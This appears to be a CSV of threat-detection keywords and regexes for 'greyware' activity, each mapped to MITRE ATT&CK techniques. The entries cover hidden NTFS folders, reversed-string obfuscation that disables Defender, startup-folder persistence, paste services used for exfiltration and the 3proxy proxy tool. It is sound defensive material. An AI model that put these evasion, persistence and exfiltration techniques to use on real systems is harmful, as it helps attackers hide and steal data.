"keyword","metadata_keyword_regex","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_tags","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at" "*...::$index_allocation*",".{0,1000}\.\.\.\:\:\$index_allocation.{0,1000}","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*cd *.::$index_allocation*",".{0,1000}cd\s.{0,1000}\.\:\:\$index_allocation.{0,1000}","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*md *.::$index_allocation*",".{0,1000}md\s.{0,1000}\.\:\:\$index_allocation.{0,1000}","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "* ecivreS-potS*",".{0,1000}\secivreS\-potS.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* gifnoc 
cs*",".{0,1000}\sgifnoc\scs.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* noitcetorPAUP*",".{0,1000}\snoitcetorPAUP.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*%tooRmetsyS%*",".{0,1000}\%tooRmetsyS\%.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*..\..\..\..\..\..\Windows\System32\cmd.exe*",".{0,1000}\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\Windows\\System32\\cmd\.exe.{0,1000}","greyware_tool_keyword","_","attempt to bypass security controls or execute commands from an unexpected location","T1036 - T1059","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://twitter.com/malwrhunterteam/status/1737220172220620854/photo/1","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A" "*/keygen.exe*",".{0,1000}\/keygen\.exe.{0,1000}","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malware","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/PAYMENTS.exe*",".{0,1000}\/PAYMENTS\.exe.{0,1000}","greyware_tool_keyword","_","suspicious file name - has been used by threat actors","T1566","TA0001","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\1.bat",".{0,1000}\\1\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" 
"*\1.dll",".{0,1000}\\1\.dll","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\1.exe",".{0,1000}\\1\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\2.bat",".{0,1000}\\2\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\2.dll",".{0,1000}\\2\.dll","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\2.exe",".{0,1000}\\2\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\3.bat",".{0,1000}\\3\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\3.dll",".{0,1000}\\3\.dll","greyware_tool_keyword","_","Suspicious file names - One 
character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\3.exe",".{0,1000}\\3\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\4.bat",".{0,1000}\\4\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\4.dll",".{0,1000}\\4\.dll","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\4.exe",".{0,1000}\\4\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\5.bat",".{0,1000}\\5\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\5.dll",".{0,1000}\\5\.dll","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - 
T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\5.exe",".{0,1000}\\5\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\6.bat",".{0,1000}\\6\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\6.dll",".{0,1000}\\6\.dll","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\6.exe",".{0,1000}\\6\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\7.bat",".{0,1000}\\7\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\7.dll",".{0,1000}\\7\.dll","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive 
rate can be high","2","10","N/A","N/A","N/A","N/A" "*\7.exe",".{0,1000}\\7\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\8.bat",".{0,1000}\\8\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\8.dll",".{0,1000}\\8\.dll","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\8.exe",".{0,1000}\\8\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\9.bat",".{0,1000}\\9\.bat","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\9.dll",".{0,1000}\\9\.dll","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" 
"*\9.exe",".{0,1000}\\9\.exe","greyware_tool_keyword","_","Suspicious file names - One character executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.bat*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.cmd*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.hta*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.ps1*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs*",".{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","_","script in startup location","T1059 - T1037 - 
T1060","TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A" "*\keygen.exe*",".{0,1000}\\keygen\.exe.{0,1000}","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malware","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\PAYMENT.hta*",".{0,1000}\\PAYMENT\.hta.{0,1000}","greyware_tool_keyword","_","suspicious file name - has been used by threat actors","T1566","TA0001","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PAYMENT.hta*",".{0,1000}\\PAYMENT\.hta.{0,1000}","greyware_tool_keyword","_","suspicious file name - has been used by threat actors","T1566","TA0001","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PAYMENTS.exe*",".{0,1000}\\PAYMENTS\.exe.{0,1000}","greyware_tool_keyword","_","suspicious file name - has been used by threat actors","T1566","TA0001","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*c/ exe.dmc*",".{0,1000}c\/\sexe\.dmc.{0,1000}","greyware_tool_keyword","_","reversed string cmd.exe /c obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*c:\*\\u0*\\u0*\\u0*\\u0*",".{0,1000}c\:\\.{0,1000}\\\\u0.{0,1000}\\\\u0.{0,1000}\\\\u0.{0,1000}\\\\u0.{0,1000}","greyware_tool_keyword","_","file path containing mixed Unicode-escaped and ASCII characters to evade detection","T1036 - T1027","TA0005","N/A","N/A","Defense Evasion","https://cloud.google.com/blog/topics/threat-intelligence/melting-unc2198-icedid-to-ransomware-operations","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A" "*delbasiD epyTputratS- *",".{0,1000}delbasiD\sepyTputratS\-\s.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense 
Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ecnereferPpM-teS*",".{0,1000}ecnereferPpM\-teS.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*eliforPllaweriFteN-teS*",".{0,1000}eliforPllaweriFteN\-teS.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*exe.23lldnur*",".{0,1000}exe\.23lldnur.{0,1000}","greyware_tool_keyword","_","reversed string rundll32.exe obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*exe.erolpxei*",".{0,1000}exe\.erolpxei.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*exe.rerolpxe*",".{0,1000}exe\.rerolpxe.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*exe.ssasl*",".{0,1000}exe\.ssasl.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*exe.tsohcvs*",".{0,1000}exe\.tsohcvs.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*gnirotinoMemitlaeRelbasiD*",".{0,1000}gnirotinoMemitlaeRelbasiD.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*https://requestbin.net/r/*",".{0,1000}https\:\/\/requestbin\.net\/r\/.{0,1000}","greyware_tool_keyword","_","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://requestbin.net","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A" "*llawerifvda hsten*",".{0,1000}llawerifvda\shsten.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*niB.elcyceR$*",".{0,1000}niB\.elcyceR\$.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*teSlortnoCtnerruC*",".{0,1000}teSlortnoCtnerruC.{0,1000}","greyware_tool_keyword","_","reversed string for obfuscation","T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "https://*.xyz/*.ps1","http.*\.(country|stream|gdn|mom|xin|kim|men|loan|download|racing|online|science|ren|gb|win|top|review|vip|party|tech|xyz|date|faith|cricket|space|info|vn|cm|am|cc|asia|ws|tk|biz|su|st|ge|pk|nu|me|ph|to|tt|name|tv|kz|tc|mobi|study|click|link|trade|accountant|cf|gq|ml|ga|pw)\/.*\.(exe|vbs|bat|rar|ps1|doc|docm|xls|xlsm|pptm|rtf|hta|dll|ws|wsf|sct|zip|bin)$","greyware_tool_keyword","_","Suspicious tlds with suspicious file types","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*0bin - encrypted pastebin*",".{0,1000}0bin\s\-\sencrypted\spastebin.{0,1000}","greyware_tool_keyword","0bin.net","Accessing a paste on 0bin.net","T1213 - T1190","TA0001 - TA0009 - 
TA0010","N/A","N/A","Collection","https://0bin.net","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*A client side encrypted PasteBin*",".{0,1000}A\sclient\sside\sencrypted\sPasteBin.{0,1000}","greyware_tool_keyword","0bin.net","Accessing a paste on 0bin.net","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Collection","https://0bin.net","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*https://0bin.net/paste/*+*",".{0,1000}https\:\/\/0bin\.net\/paste\/.{0,1000}\+.{0,1000}","greyware_tool_keyword","0bin.net","Accessing a paste on 0bin.net","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Collection","https://0bin.net","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*https://0bin.net/paste/create*",".{0,1000}https\:\/\/0bin\.net\/paste\/create.{0,1000}","greyware_tool_keyword","0bin.net","Creating a paste on 0bin.net","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://0bin.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*fcfhplploccackoneaefokcmbjfbkenj*",".{0,1000}fcfhplploccackoneaefokcmbjfbkenj.{0,1000}","greyware_tool_keyword","1clickVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*www.1secmail.com/api/v1/?action=*",".{0,1000}www\.1secmail\.com\/api\/v1\/\?action\=.{0,1000}","greyware_tool_keyword","1secmail.com","using the API of 1secmail (temporary email service) could be abused by malicious actors - observed in SafeBreach-Labs/DoubleDrive tool","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://www.1secmail.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*https://1ty.me/*",".{0,1000}https\:\/\/1ty\.me\/.{0,1000}","greyware_tool_keyword","1ty.me","temporary notes service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","N/A","Collection","https://1ty.me","1","1","N/A","downloading or uploading data","10","10","N/A","N/A","N/A","N/A" "*https://1ty.me/?mode=ajax&cmd=create_note*",".{0,1000}https\:\/\/1ty\.me\/\?mode\=ajax\&cmd\=create_note.{0,1000}","greyware_tool_keyword","1ty.me","temporary notes service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://1ty.me","1","1","N/A","creating note","10","10","N/A","N/A","N/A","N/A" "*/3proxy-*.deb*",".{0,1000}\/3proxy\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*/3proxy-*.rpm*",".{0,1000}\/3proxy\-.{0,1000}\.rpm.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*/3proxy-*.zip*",".{0,1000}\/3proxy\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*/3proxy.exe*",".{0,1000}\/3proxy\.exe.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*/3proxy.git*",".{0,1000}\/3proxy\.git.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*/3proxy.log*",".{0,1000}\/3proxy\.log.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*/etc/3proxy/conf*",".{0,1000}\/etc\/3proxy\/conf.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*\3proxy-*.deb*",".{0,1000}\\3proxy\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*\3proxy-*.rpm*",".{0,1000}\\3proxy\-.{0,1000}\.rpm.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*\3proxy-*.zip*",".{0,1000}\\3proxy\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - 
T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*\3proxy.cfg*",".{0,1000}\\3proxy\.cfg.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*\3proxy.exe*",".{0,1000}\\3proxy\.exe.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*\3proxy.key*",".{0,1000}\\3proxy\.key.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*\3proxy.log*",".{0,1000}\\3proxy\.log.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*\bin\3proxy*",".{0,1000}\\bin\\3proxy.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" 
"*128s3proxy.key""*",".{0,1000}128s3proxy\.key\"".{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*3proxy --install*",".{0,1000}3proxy\s\-\-install.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*3proxy --remove*",".{0,1000}3proxy\s\-\-remove.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*3proxy tiny proxy server*",".{0,1000}3proxy\stiny\sproxy\sserver.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*3proxy Windows Authentication 